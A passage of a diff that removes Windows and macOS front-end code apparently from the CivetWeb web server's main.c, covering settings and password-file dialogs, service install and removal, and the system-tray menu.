-	            HEIGHT,
-	            "Realm:");
-	add_control(&p,
-	            dia,
-	            0x81,
-	            ID_CONTROLS + 2,
-	            WS_CHILD | WS_VISIBLE | WS_BORDER | ES_AUTOHSCROLL
-	                | ES_READONLY,
-	            15 + LABEL_WIDTH,
-	            y,
-	            WIDTH - LABEL_WIDTH - 25,
-	            HEIGHT,
-	            realm);
-
-	y += HEIGHT;
-	add_control(&p,
-	            dia,
-	            0x82,
-	            ID_STATIC,
-	            WS_VISIBLE | WS_CHILD,
-	            10,
-	            y,
-	            LABEL_WIDTH,
-	            HEIGHT,
-	            "Password:");
-	add_control(&p,
-	            dia,
-	            0x81,
-	            ID_INPUT_LINE,
-	            WS_CHILD | WS_VISIBLE | WS_BORDER | ES_AUTOHSCROLL | WS_TABSTOP,
-	            15 + LABEL_WIDTH,
-	            y,
-	            WIDTH - LABEL_WIDTH - 25,
-	            HEIGHT,
-	            "");
-
-	y += (WORD)(HEIGHT * 2);
-	add_control(&p,
-	            dia,
-	            0x80,
-	            IDOK,
-	            WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON | WS_TABSTOP,
-	            80,
-	            y,
-	            55,
-	            12,
-	            "Ok");
-	add_control(&p,
-	            dia,
-	            0x80,
-	            IDCANCEL,
-	            WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON | WS_TABSTOP,
-	            140,
-	            y,
-	            55,
-	            12,
-	            "Cancel");
-
-	assert((intptr_t)p - (intptr_t)mem < (intptr_t)sizeof(mem));
-
-	dia->cy = y + (WORD)(HEIGHT * 1.5);
-
-	s_dlg_proc_param.name = "Modify password";
-	s_dlg_proc_param.fRetry = NULL;
-
-	ok =
-	    (IDOK == DialogBoxIndirectParam(
-	                 NULL, dia, NULL, InputDlgProc, (LPARAM)&s_dlg_proc_param));
-
-	s_dlg_proc_param.hWnd = NULL;
-	s_dlg_proc_param.guard = 0;
-
-	return ok;
-
-#undef HEIGHT
-#undef WIDTH
-#undef LABEL_WIDTH
-}
-
-
-/* Dialog proc for password dialog */
-static INT_PTR CALLBACK
-PasswordDlgProc(HWND hDlg, UINT msg, WPARAM wParam, LPARAM lParam)
-{
-	static const char *passfile = 0;
-	char domain[256], user[256], password[256];
-	WORD ctrlId;
-	struct dlg_proc_param *pdlg_proc_param;
-
-	switch (msg) {
-	case WM_CLOSE:
-		passfile = 0;
-		DestroyWindow(hDlg);
-		break;
-
-	case WM_COMMAND:
-		ctrlId = LOWORD(wParam);
-		if (ctrlId == ID_ADD_USER) {
-			/* Add user */
-			GetWindowText(GetDlgItem(hDlg, ID_ADD_USER_NAME),
-			              user,
-			              sizeof(user));
-			GetWindowText(GetDlgItem(hDlg, ID_ADD_USER_REALM),
-			              domain,
-			              sizeof(domain));
-			if (get_password(user, domain, password, sizeof(password))) {
-				mg_modify_passwords_file(passfile, domain, user, password);
-				EndDialog(hDlg, IDOK);
-			}
-		} else if ((ctrlId >= (ID_CONTROLS + ID_FILE_BUTTONS_DELTA * 3))
-		           && (ctrlId < (ID_CONTROLS + ID_FILE_BUTTONS_DELTA * 4))) {
-			/* Modify password */
-			GetWindowText(GetDlgItem(hDlg, ctrlId - ID_FILE_BUTTONS_DELTA * 3),
-			              user,
-			              sizeof(user));
-			GetWindowText(GetDlgItem(hDlg, ctrlId - ID_FILE_BUTTONS_DELTA * 2),
-			              domain,
-			              sizeof(domain));
-			if (get_password(user, domain, password, sizeof(password))) {
-				mg_modify_passwords_file(passfile, domain, user, password);
-				EndDialog(hDlg, IDOK);
-			}
-		} else if ((ctrlId >= (ID_CONTROLS + ID_FILE_BUTTONS_DELTA * 2))
-		           && (ctrlId < (ID_CONTROLS + ID_FILE_BUTTONS_DELTA * 3))) {
-			/* Remove user */
-			GetWindowText(GetDlgItem(hDlg, ctrlId - ID_FILE_BUTTONS_DELTA * 2),
-			              user,
-			              sizeof(user));
-			GetWindowText(GetDlgItem(hDlg, ctrlId - ID_FILE_BUTTONS_DELTA),
-			              domain,
-			              sizeof(domain));
-			mg_modify_passwords_file(passfile, domain, user, NULL);
-			EndDialog(hDlg, IDOK);
-		}
-		break;
-
-	case WM_INITDIALOG:
-		pdlg_proc_param = (struct dlg_proc_param *)lParam;
-		pdlg_proc_param->hWnd = hDlg;
-		passfile = pdlg_proc_param->name;
-		SendMessage(hDlg, WM_SETICON, (WPARAM)ICON_SMALL, (LPARAM)hIcon);
-		SendMessage(hDlg, WM_SETICON, (WPARAM)ICON_BIG, (LPARAM)hIcon);
-		SetWindowText(hDlg, passfile);
-		SetFocus(GetDlgItem(hDlg, ID_ADD_USER_NAME));
-		break;
-
-	default:
-		break;
-	}
-
-	return FALSE;
-}
-
-
-static void
-add_control(unsigned char **mem,
-            DLGTEMPLATE *dia,
-            WORD type,
-            WORD id,
-            DWORD style,
-            short x,
-            short y,
-            short cx,
-            short cy,
-            const char *caption)
-{
-	DLGITEMTEMPLATE *tp;
-	LPWORD p;
-
-	dia->cdit++;
-
-	*mem = (unsigned char *)align(*mem, 3);
-	tp = (DLGITEMTEMPLATE *)*mem;
-
-	tp->id = id;
-	tp->style = style;
-	tp->dwExtendedStyle = 0;
-	tp->x = x;
-	tp->y = y;
-	tp->cx = cx;
-	tp->cy = cy;
-
-	p = (LPWORD)align(*mem + sizeof(*tp), 1);
-	*p++ = 0xffff;
-	*p++ = type;
-
-	while (*caption != '\0') {
-		*p++ = (WCHAR)*caption++;
-	}
-	*p++ = 0;
-	p = (LPWORD)align(p, 1);
-
-	*p++ = 0;
-	*mem = (unsigned char *)p;
-}
-
-
-static void
-show_settings_dialog()
-{
-#define HEIGHT (15)
-#define WIDTH (460)
-#define LABEL_WIDTH (90)
-
-	unsigned char mem[16 * 1024], *p;
-	const struct mg_option *options;
-	DWORD style;
-	DLGTEMPLATE *dia = (DLGTEMPLATE *)mem;
-	WORD i, cl, nelems = 0;
-	short width, x, y;
-	static struct dlg_proc_param s_dlg_proc_param;
-
-	static struct {
-		DLGTEMPLATE dlg_template; /* 18 bytes */
-		WORD menu, dlg_class;
-		wchar_t caption[1];
-		WORD fontsiz;
-		wchar_t fontface[7];
-	} dialog_header = {{WS_CAPTION | WS_POPUP | WS_SYSMENU | WS_VISIBLE
-	                        | DS_SETFONT | WS_DLGFRAME,
-	                    WS_EX_TOOLWINDOW,
-	                    0,
-	                    200,
-	                    200,
-	                    WIDTH,
-	                    0},
-	                   0,
-	                   0,
-	                   L"",
-	                   8,
-	                   L"Tahoma"};
-
-	if (s_dlg_proc_param.guard == 0) {
-		memset(&s_dlg_proc_param, 0, sizeof(s_dlg_proc_param));
-		s_dlg_proc_param.guard = 1;
-	} else {
-		SetForegroundWindow(s_dlg_proc_param.hWnd);
-		return;
-	}
-
-	(void)memset(mem, 0, sizeof(mem));
-	(void)memcpy(mem, &dialog_header, sizeof(dialog_header));
-	p = mem + sizeof(dialog_header);
-
-	options = mg_get_valid_options();
-	for (i = 0; options[i].name != NULL; i++) {
-		style = WS_CHILD | WS_VISIBLE | WS_TABSTOP;
-		x = 10 + (WIDTH / 2) * (nelems % 2);
-		y = (nelems / 2 + 1) * HEIGHT + 5;
-		width = WIDTH / 2 - 20 - LABEL_WIDTH;
-		if (options[i].type == CONFIG_TYPE_NUMBER) {
-			style |= ES_NUMBER;
-			cl = 0x81;
-			style |= WS_BORDER | ES_AUTOHSCROLL;
-		} else if (options[i].type == CONFIG_TYPE_BOOLEAN) {
-			cl = 0x80;
-			style |= BS_AUTOCHECKBOX;
-		} else if ((options[i].type == CONFIG_TYPE_FILE)
-		           || (options[i].type == CONFIG_TYPE_DIRECTORY)) {
-			style |= WS_BORDER | ES_AUTOHSCROLL;
-			width -= 20;
-			cl = 0x81;
-			add_control(&p,
-			            dia,
-			            0x80,
-			            ID_CONTROLS + i + ID_FILE_BUTTONS_DELTA,
-			            WS_VISIBLE | WS_CHILD | BS_PUSHBUTTON,
-			            x + width + LABEL_WIDTH + 5,
-			            y,
-			            15,
-			            12,
-			            "...");
-		} else if (options[i].type == CONFIG_TYPE_STRING_MULTILINE) {
-			/* TODO: This is not really uer friendly */
-			cl = 0x81;
-			style |= WS_BORDER | ES_AUTOHSCROLL | ES_MULTILINE | ES_WANTRETURN
-			         | ES_AUTOVSCROLL;
-		} else {
-			cl = 0x81;
-			style |= WS_BORDER | ES_AUTOHSCROLL;
-		}
-		add_control(&p,
-		            dia,
-		            0x82,
-		            ID_STATIC,
-		            WS_VISIBLE | WS_CHILD,
-		            x,
-		            y,
-		            LABEL_WIDTH,
-		            HEIGHT,
-		            options[i].name);
-		add_control(&p,
-		            dia,
-		            cl,
-		            ID_CONTROLS + i,
-		            style,
-		            x + LABEL_WIDTH,
-		            y,
-		            width,
-		            12,
-		            "");
-		nelems++;
-
-		assert(((intptr_t)p - (intptr_t)mem) < (intptr_t)sizeof(mem));
-	}
-
-	y = (((nelems + 1) / 2 + 1) * HEIGHT + 5);
-	add_control(&p,
-	            dia,
-	            0x80,
-	            ID_GROUP,
-	            WS_CHILD | WS_VISIBLE | BS_GROUPBOX,
-	            5,
-	            5,
-	            WIDTH - 10,
-	            y,
-	            " Settings ");
-	y += 10;
-	add_control(&p,
-	            dia,
-	            0x80,
-	            ID_SAVE,
-	            WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON | WS_TABSTOP,
-	            WIDTH - 70,
-	            y,
-	            65,
-	            12,
-	            "Save Settings");
-	add_control(&p,
-	            dia,
-	            0x80,
-	            ID_RESET_DEFAULTS,
-	            WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON | WS_TABSTOP,
-	            WIDTH - 140,
-	            y,
-	            65,
-	            12,
-	            "Reset to defaults");
-	add_control(&p,
-	            dia,
-	            0x80,
-	            ID_RESET_FILE,
-	            WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON | WS_TABSTOP,
-	            WIDTH - 210,
-	            y,
-	            65,
-	            12,
-	            "Reload from file");
-	add_control(&p,
-	            dia,
-	            0x80,
-	            ID_RESET_ACTIVE,
-	            WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON | WS_TABSTOP,
-	            WIDTH - 280,
-	            y,
-	            65,
-	            12,
-	            "Reload active");
-	add_control(&p,
-	            dia,
-	            0x82,
-	            ID_STATIC,
-	            WS_CHILD | WS_VISIBLE | WS_DISABLED,
-	            5,
-	            y,
-	            100,
-	            12,
-	            g_server_base_name);
-
-	assert(((intptr_t)p - (intptr_t)mem) < (intptr_t)sizeof(mem));
-
-	dia->cy = ((nelems + 1) / 2 + 1) * HEIGHT + 30;
-
-	s_dlg_proc_param.fRetry = NULL;
-
-	DialogBoxIndirectParam(
-	    NULL, dia, NULL, SettingsDlgProc, (LPARAM)&s_dlg_proc_param);
-
-	s_dlg_proc_param.hWnd = NULL;
-	s_dlg_proc_param.guard = 0;
-
-#undef HEIGHT
-#undef WIDTH
-#undef LABEL_WIDTH
-}
-
-
-static void
-change_password_file()
-{
-#define HEIGHT (15)
-#define WIDTH (320)
-#define LABEL_WIDTH (90)
-
-	OPENFILENAME of;
-	char path[PATH_MAX] = PASSWORDS_FILE_NAME;
-	char strbuf[256], u[256], d[256];
-	HWND hDlg = NULL;
-	FILE *f;
-	short y, nelems;
-	unsigned char mem[4096], *p;
-	DLGTEMPLATE *dia = (DLGTEMPLATE *)mem;
-	const char *domain = mg_get_option(g_ctx, "authentication_domain");
-	static struct dlg_proc_param s_dlg_proc_param;
-
-	static struct {
-		DLGTEMPLATE dlg_template; /* 18 bytes */
-		WORD menu, dlg_class;
-		wchar_t caption[1];
-		WORD fontsiz;
-		wchar_t fontface[7];
-	} dialog_header = {{WS_CAPTION | WS_POPUP | WS_SYSMENU | WS_VISIBLE
-	                        | DS_SETFONT | WS_DLGFRAME,
-	                    WS_EX_TOOLWINDOW,
-	                    0,
-	                    200,
-	                    200,
-	                    WIDTH,
-	                    0},
-	                   0,
-	                   0,
-	                   L"",
-	                   8,
-	                   L"Tahoma"};
-
-	if (s_dlg_proc_param.guard == 0) {
-		memset(&s_dlg_proc_param, 0, sizeof(s_dlg_proc_param));
-		s_dlg_proc_param.guard = 1;
-	} else {
-		SetForegroundWindow(s_dlg_proc_param.hWnd);
-		return;
-	}
-
-	memset(&of, 0, sizeof(of));
-	of.lStructSize = sizeof(of);
-	of.hwndOwner = (HWND)hDlg;
-	of.lpstrFile = path;
-	of.nMaxFile = sizeof(path);
-	of.lpstrInitialDir = mg_get_option(g_ctx, "document_root");
-	of.Flags = OFN_CREATEPROMPT | OFN_NOCHANGEDIR | OFN_HIDEREADONLY;
-
-	if (IDOK != GetSaveFileName(&of)) {
-		s_dlg_proc_param.guard = 0;
-		return;
-	}
-
-	f = fopen(path, "a+");
-	if (f) {
-		fclose(f);
-	} else {
-		MessageBox(NULL, path, "Can not open file", MB_ICONERROR);
-		s_dlg_proc_param.guard = 0;
-		return;
-	}
-
-	do {
-		s_dlg_proc_param.hWnd = NULL;
-		(void)memset(mem, 0, sizeof(mem));
-		(void)memcpy(mem, &dialog_header, sizeof(dialog_header));
-		p = mem + sizeof(dialog_header);
-
-		f = fopen(path, "r+");
-		if (!f) {
-			MessageBox(NULL, path, "Can not open file", MB_ICONERROR);
-			s_dlg_proc_param.guard = 0;
-			return;
-		}
-
-		nelems = 0;
-		while (fgets(strbuf, sizeof(strbuf), f)) {
-			if (sscanf(strbuf, "%255[^:]:%255[^:]:%*s", u, d) != 2) {
-				continue;
-			}
-			u[255] = 0;
-			d[255] = 0;
-			y = (nelems + 1) * HEIGHT + 5;
-			add_control(&p,
-			            dia,
-			            0x80,
-			            ID_CONTROLS + nelems + ID_FILE_BUTTONS_DELTA * 3,
-			            WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON | WS_TABSTOP,
-			            10,
-			            y,
-			            65,
-			            12,
-			            "Modify password");
-			add_control(&p,
-			            dia,
-			            0x80,
-			            ID_CONTROLS + nelems + ID_FILE_BUTTONS_DELTA * 2,
-			            WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON | WS_TABSTOP,
-			            80,
-			            y,
-			            55,
-			            12,
-			            "Remove user");
-			add_control(&p,
-			            dia,
-			            0x81,
-			            ID_CONTROLS + nelems + ID_FILE_BUTTONS_DELTA,
-			            WS_CHILD | WS_VISIBLE | WS_BORDER | ES_AUTOHSCROLL
-			                | ES_READONLY,
-			            245,
-			            y,
-			            60,
-			            12,
-			            d);
-			add_control(&p,
-			            dia,
-			            0x81,
-			            ID_CONTROLS + nelems,
-			            WS_CHILD | WS_VISIBLE | WS_BORDER | ES_AUTOHSCROLL
-			                | ES_READONLY,
-			            140,
-			            y,
-			            100,
-			            12,
-			            u);
-
-			nelems++;
-			assert(((intptr_t)p - (intptr_t)mem) < (intptr_t)sizeof(mem));
-		}
-		fclose(f);
-
-		y = (nelems + 1) * HEIGHT + 10;
-		add_control(&p,
-		            dia,
-		            0x80,
-		            ID_ADD_USER,
-		            WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON | WS_TABSTOP,
-		            80,
-		            y,
-		            55,
-		            12,
-		            "Add user");
-		add_control(&p,
-		            dia,
-		            0x81,
-		            ID_ADD_USER_NAME,
-		            WS_CHILD | WS_VISIBLE | WS_BORDER | ES_AUTOHSCROLL
-		                | WS_TABSTOP,
-		            140,
-		            y,
-		            100,
-		            12,
-		            "");
-		add_control(&p,
-		            dia,
-		            0x81,
-		            ID_ADD_USER_REALM,
-		            WS_CHILD | WS_VISIBLE | WS_BORDER | ES_AUTOHSCROLL
-		                | WS_TABSTOP,
-		            245,
-		            y,
-		            60,
-		            12,
-		            domain);
-
-		y = (nelems + 2) * HEIGHT + 10;
-		add_control(&p,
-		            dia,
-		            0x80,
-		            ID_GROUP,
-		            WS_CHILD | WS_VISIBLE | BS_GROUPBOX,
-		            5,
-		            5,
-		            WIDTH - 10,
-		            y,
-		            " Users ");
-
-		y += HEIGHT;
-		add_control(&p,
-		            dia,
-		            0x82,
-		            ID_STATIC,
-		            WS_CHILD | WS_VISIBLE | WS_DISABLED,
-		            5,
-		            y,
-		            100,
-		            12,
-		            g_server_base_name);
-
-		assert(((intptr_t)p - (intptr_t)mem) < (intptr_t)sizeof(mem));
-
-		dia->cy = y + 20;
-
-		s_dlg_proc_param.name = path;
-		s_dlg_proc_param.fRetry = NULL;
-
-	} while ((IDOK == DialogBoxIndirectParam(NULL,
-	                                         dia,
-	                                         NULL,
-	                                         PasswordDlgProc,
-	                                         (LPARAM)&s_dlg_proc_param))
-	         && (!g_exit_flag));
-
-	s_dlg_proc_param.hWnd = NULL;
-	s_dlg_proc_param.guard = 0;
-
-#undef HEIGHT
-#undef WIDTH
-#undef LABEL_WIDTH
-}
-
-
-static BOOL
-sysinfo_reload(struct dlg_proc_param *prm)
-{
-	static char *buf = 0;
-	int cl, rl;
-
-	cl = mg_get_context_info(g_ctx, NULL, 0);
-	free(buf);
-	cl += 510;
-	buf = (char *)malloc(cl + 1);
-	rl = mg_get_context_info(g_ctx, buf, cl);
-	if ((rl > cl) || (rl <= 0)) {
-		if (g_ctx == NULL) {
-			prm->buffer = "Server not running";
-		} else if (rl <= 0) {
-			prm->buffer = "No server statistics available";
-		} else {
-			prm->buffer = "Please retry";
-		}
-	} else {
-		prm->buffer = buf;
-	}
-
-	return TRUE;
-}
-
-
-int
-show_system_info()
-{
-#define HEIGHT (15)
-#define WIDTH (320)
-#define LABEL_WIDTH (50)
-
-	unsigned char mem[4096], *p;
-	DLGTEMPLATE *dia = (DLGTEMPLATE *)mem;
-	int ok;
-	short y;
-	static struct dlg_proc_param s_dlg_proc_param;
-
-	static struct {
-		DLGTEMPLATE dlg_template; /* 18 bytes */
-		WORD menu, dlg_class;
-		wchar_t caption[1];
-		WORD fontsiz;
-		wchar_t fontface[7];
-	} dialog_header = {{WS_CAPTION | WS_POPUP | WS_SYSMENU | WS_VISIBLE
-	                        | DS_SETFONT | WS_DLGFRAME,
-	                    WS_EX_TOOLWINDOW,
-	                    0,
-	                    200,
-	                    200,
-	                    WIDTH,
-	                    0},
-	                   0,
-	                   0,
-	                   L"",
-	                   8,
-	                   L"Tahoma"};
-
-	/* Only allow one instance of this dialog to be open. */
-	if (s_dlg_proc_param.guard == 0) {
-		memset(&s_dlg_proc_param, 0, sizeof(s_dlg_proc_param));
-		s_dlg_proc_param.guard = 1;
-	} else {
-		SetForegroundWindow(s_dlg_proc_param.hWnd);
-		return 0;
-	}
-
-	/* Create the dialog */
-	(void)memset(mem, 0, sizeof(mem));
-	(void)memcpy(mem, &dialog_header, sizeof(dialog_header));
-	p = mem + sizeof(dialog_header);
-
-	y = HEIGHT;
-	add_control(&p,
-	            dia,
-	            0x82,
-	            ID_STATIC,
-	            WS_VISIBLE | WS_CHILD,
-	            10,
-	            y,
-	            LABEL_WIDTH,
-	            HEIGHT,
-	            "System Information:");
-	add_control(&p,
-	            dia,
-	            0x81,
-	            ID_CONTROLS + 1,
-	            WS_CHILD | WS_VISIBLE | WS_BORDER | ES_AUTOHSCROLL
-	                | ES_AUTOVSCROLL | ES_MULTILINE | ES_READONLY,
-	            15 + LABEL_WIDTH,
-	            y,
-	            WIDTH - LABEL_WIDTH - 25,
-	            HEIGHT * 7,
-	            g_system_info);
-
-	y += (WORD)(HEIGHT * 8);
-
-	add_control(&p,
-	            dia,
-	            0x80,
-	            IDRETRY,
-	            WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON | WS_TABSTOP,
-	            WIDTH - 10 - 55 - 10 - 55,
-	            y,
-	            55,
-	            12,
-	            "Reload");
-
-	add_control(&p,
-	            dia,
-	            0x80,
-	            IDOK,
-	            WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON | WS_TABSTOP,
-	            WIDTH - 10 - 55,
-	            y,
-	            55,
-	            12,
-	            "Close");
-
-	assert((intptr_t)p - (intptr_t)mem < (intptr_t)sizeof(mem));
-
-	dia->cy = y + (WORD)(HEIGHT * 1.5);
-
-	s_dlg_proc_param.name = "System information";
-	s_dlg_proc_param.fRetry = sysinfo_reload;
-	s_dlg_proc_param.idRetry = ID_CONTROLS + 1; /* Reload field with this ID */
-
-	ok =
-	    (IDOK == DialogBoxIndirectParam(
-	                 NULL, dia, NULL, InputDlgProc, (LPARAM)&s_dlg_proc_param));
-
-	s_dlg_proc_param.hWnd = NULL;
-	s_dlg_proc_param.guard = 0;
-
-	return ok;
-
-#undef HEIGHT
-#undef WIDTH
-#undef LABEL_WIDTH
-}
-
-
-static int
-manage_service(int action)
-{
-	const char *service_name = g_server_name;
-	SC_HANDLE hSCM = NULL, hService = NULL;
-	SERVICE_DESCRIPTION descr;
-	char path[PATH_MAX + 20] = ""; /* Path to executable plus magic argument */
-	int success = 1;
-
-	descr.lpDescription = (LPSTR)g_server_name;
-
-	if ((hSCM = OpenSCManager(NULL,
-	                          NULL,
-	                          action == ID_INSTALL_SERVICE ? GENERIC_WRITE
-	                                                       : GENERIC_READ))
-	    == NULL) {
-		success = 0;
-		show_error();
-	} else if (action == ID_INSTALL_SERVICE) {
-		path[sizeof(path) - 1] = 0;
-		GetModuleFileName(NULL, path, sizeof(path) - 1);
-		strncat(path, " ", sizeof(path) - 1);
-		strncat(path, service_magic_argument, sizeof(path) - 1);
-		hService = CreateService(hSCM,
-		                         service_name,
-		                         service_name,
-		                         SERVICE_ALL_ACCESS,
-		                         SERVICE_WIN32_OWN_PROCESS,
-		                         SERVICE_AUTO_START,
-		                         SERVICE_ERROR_NORMAL,
-		                         path,
-		                         NULL,
-		                         NULL,
-		                         NULL,
-		                         NULL,
-		                         NULL);
-		if (hService) {
-			ChangeServiceConfig2(hService, SERVICE_CONFIG_DESCRIPTION, &descr);
-		} else {
-			show_error();
-		}
-	} else if (action == ID_REMOVE_SERVICE) {
-		if ((hService = OpenService(hSCM, service_name, DELETE)) == NULL
-		    || !DeleteService(hService)) {
-			show_error();
-		}
-	} else if ((hService =
-	                OpenService(hSCM, service_name, SERVICE_QUERY_STATUS))
-	           == NULL) {
-		success = 0;
-	}
-
-	if (hService)
-		CloseServiceHandle(hService);
-	if (hSCM)
-		CloseServiceHandle(hSCM);
-
-	return success;
-}
-
-
-/* Window proc for taskbar icon */
-static LRESULT CALLBACK
-WindowProc(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam)
-{
-	static SERVICE_TABLE_ENTRY service_table[2];
-	int service_installed;
-	char buf[200], *service_argv[2];
-	POINT pt;
-	HMENU hMenu;
-	static UINT s_uTaskbarRestart; /* for taskbar creation */
-
-	service_argv[0] = __argv[0];
-	service_argv[1] = NULL;
-
-	memset(service_table, 0, sizeof(service_table));
-	service_table[0].lpServiceName = (LPSTR)g_server_name;
-	service_table[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
-
-	switch (msg) {
-
-	case WM_CREATE:
-		if (__argv[1] != NULL && !strcmp(__argv[1], service_magic_argument)) {
-			start_civetweb(1, service_argv);
-			StartServiceCtrlDispatcher(service_table);
-			exit(EXIT_SUCCESS);
-		} else {
-			start_civetweb(__argc, __argv);
-			s_uTaskbarRestart = RegisterWindowMessage(TEXT("TaskbarCreated"));
-		}
-		break;
-
-	case WM_COMMAND:
-		switch (LOWORD(wParam)) {
-		case ID_QUIT:
-			stop_civetweb();
-			Shell_NotifyIcon(NIM_DELETE, &TrayIcon);
-			g_exit_flag = 1;
-			PostQuitMessage(0);
-			return 0;
-		case ID_SETTINGS:
-			show_settings_dialog();
-			break;
-		case ID_PASSWORD:
-			change_password_file();
-			break;
-		case ID_SYSINFO:
-			show_system_info();
-			break;
-		case ID_INSTALL_SERVICE:
-		case ID_REMOVE_SERVICE:
-			manage_service(LOWORD(wParam));
-			break;
-		case ID_CONNECT:
-			fprintf(stdout, "[%s]\n", get_url_to_first_open_port(g_ctx));
-			ShellExecute(NULL,
-			             "open",
-			             get_url_to_first_open_port(g_ctx),
-			             NULL,
-			             NULL,
-			             SW_SHOW);
-			break;
-		case ID_WEBSITE:
-			fprintf(stdout, "[%s]\n", g_website);
-			ShellExecute(NULL, "open", g_website, NULL, NULL, SW_SHOW);
-			break;
-		}
-		break;
-
-	case WM_USER:
-		switch (lParam) {
-		case WM_RBUTTONUP:
-		case WM_LBUTTONUP:
-		case WM_LBUTTONDBLCLK:
-			hMenu = CreatePopupMenu();
-			AppendMenu(hMenu,
-			           MF_STRING | MF_GRAYED,
-			           ID_SEPARATOR,
-			           g_server_name);
-			AppendMenu(hMenu, MF_SEPARATOR, ID_SEPARATOR, "");
-			service_installed = manage_service(0);
-			snprintf(buf,
-			         sizeof(buf) - 1,
-			         "NT service: %s installed",
-			         service_installed ? "" : "not");
-			buf[sizeof(buf) - 1] = 0;
-			AppendMenu(hMenu, MF_STRING | MF_GRAYED, ID_SEPARATOR, buf);
-			AppendMenu(hMenu,
-			           MF_STRING | (service_installed ? MF_GRAYED : 0),
-			           ID_INSTALL_SERVICE,
-			           "Install service");
-			AppendMenu(hMenu,
-			           MF_STRING | (!service_installed ? MF_GRAYED : 0),
-			           ID_REMOVE_SERVICE,
-			           "Deinstall service");
-			AppendMenu(hMenu, MF_SEPARATOR, ID_SEPARATOR, "");
-			AppendMenu(hMenu, MF_STRING, ID_CONNECT, "Start browser");
-			AppendMenu(hMenu, MF_STRING, ID_SETTINGS, "Edit settings");
-			AppendMenu(hMenu, MF_STRING, ID_PASSWORD, "Modify password file");
-			AppendMenu(hMenu, MF_STRING, ID_SYSINFO, "Show system info");
-			AppendMenu(hMenu, MF_STRING, ID_WEBSITE, "Visit website");
-			AppendMenu(hMenu, MF_SEPARATOR, ID_SEPARATOR, "");
-			AppendMenu(hMenu, MF_STRING, ID_QUIT, "Exit");
-			GetCursorPos(&pt);
-			SetForegroundWindow(hWnd);
-			TrackPopupMenu(hMenu, 0, pt.x, pt.y, 0, hWnd, NULL);
-			PostMessage(hWnd, WM_NULL, 0, 0);
-			DestroyMenu(hMenu);
-			break;
-		}
-		break;
-
-	case WM_CLOSE:
-		stop_civetweb();
-		Shell_NotifyIcon(NIM_DELETE, &TrayIcon);
-		g_exit_flag = 1;
-		PostQuitMessage(0);
-		return 0; /* We've just sent our own quit message, with proper hwnd. */
-
-	default:
-		if (msg == s_uTaskbarRestart)
-			Shell_NotifyIcon(NIM_ADD, &TrayIcon);
-	}
-
-	return DefWindowProc(hWnd, msg, wParam, lParam);
-}
-
-
-static int
-MakeConsole(void)
-{
-	DWORD err;
-	int ok = (GetConsoleWindow() != NULL);
-	if (!ok) {
-		if (!AttachConsole(ATTACH_PARENT_PROCESS)) {
-			FreeConsole();
-			if (!AllocConsole()) {
-				err = GetLastError();
-				if (err == ERROR_ACCESS_DENIED) {
-					MessageBox(NULL,
-					           "Insufficient rights to create a console window",
-					           "Error",
-					           MB_ICONERROR);
-				}
-			}
-			AttachConsole(GetCurrentProcessId());
-		}
-
-		ok = (GetConsoleWindow() != NULL);
-		if (ok) {
-			freopen("CONIN$", "r", stdin);
-			freopen("CONOUT$", "w", stdout);
-			freopen("CONOUT$", "w", stderr);
-		}
-	}
-
-	if (ok) {
-		SetConsoleTitle(g_server_name);
-	}
-
-	return ok;
-}
-
-
-int WINAPI
-WinMain(HINSTANCE hInst, HINSTANCE hPrev, LPSTR cmdline, int show)
-{
-	WNDCLASS cls;
-	HWND hWnd;
-	MSG msg;
-
-#if defined(DEBUG)
-	(void)MakeConsole();
-#endif
-
-	(void)hInst;
-	(void)hPrev;
-	(void)cmdline;
-	(void)show;
-
-	init_server_name((int)__argc, (const char **)__argv);
-	init_system_info();
-	memset(&cls, 0, sizeof(cls));
-	cls.lpfnWndProc = (WNDPROC)WindowProc;
-	cls.hIcon = LoadIcon(NULL, IDI_APPLICATION);
-	cls.lpszClassName = g_server_base_name;
-
-	RegisterClass(&cls);
-	hWnd = CreateWindow(cls.lpszClassName,
-	                    g_server_name,
-	                    WS_OVERLAPPEDWINDOW,
-	                    0,
-	                    0,
-	                    0,
-	                    0,
-	                    NULL,
-	                    NULL,
-	                    NULL,
-	                    NULL);
-	ShowWindow(hWnd, SW_HIDE);
-
-	if (g_icon_name) {
-		hIcon = (HICON)
-		    LoadImage(NULL, g_icon_name, IMAGE_ICON, 16, 16, LR_LOADFROMFILE);
-	} else {
-		hIcon = (HICON)LoadImage(GetModuleHandle(NULL),
-		                         MAKEINTRESOURCE(ID_ICON),
-		                         IMAGE_ICON,
-		                         16,
-		                         16,
-		                         0);
-	}
-
-	TrayIcon.cbSize = sizeof(TrayIcon);
-	TrayIcon.uID = ID_ICON;
-	TrayIcon.uFlags = NIF_ICON | NIF_MESSAGE | NIF_TIP;
-	TrayIcon.hIcon = hIcon;
-	TrayIcon.hWnd = hWnd;
-	snprintf(TrayIcon.szTip, sizeof(TrayIcon.szTip), "%s", g_server_name);
-	TrayIcon.uCallbackMessage = WM_USER;
-	Shell_NotifyIcon(NIM_ADD, &TrayIcon);
-
-	while (GetMessage(&msg, hWnd, 0, 0) > 0) {
-		TranslateMessage(&msg);
-		DispatchMessage(&msg);
-	}
-
-	free_system_info();
-
-	/* Return the WM_QUIT value. */
-	return (int)msg.wParam;
-}
-
-
-int
-main(int argc, char *argv[])
-{
-	(void)argc;
-	(void)argv;
-
-	return WinMain(0, 0, 0, 0);
-}
-
-
-#elif defined(USE_COCOA)
-#import <Cocoa/Cocoa.h>
-
-@interface Civetweb : NSObject <NSApplicationDelegate>
-- (void)openBrowser;
-- (void)shutDown;
-@end
-
-@implementation Civetweb
-- (void)openBrowser
-{
-	[[NSWorkspace sharedWorkspace]
-	    openURL:[NSURL URLWithString:[NSString stringWithUTF8String:
-	                                               get_url_to_first_open_port(
-	                                                   g_ctx)]]];
-}
-- (void)editConfig
-{
-	create_config_file(g_ctx, g_config_file_name);
-	NSString *path = [NSString stringWithUTF8String:g_config_file_name];
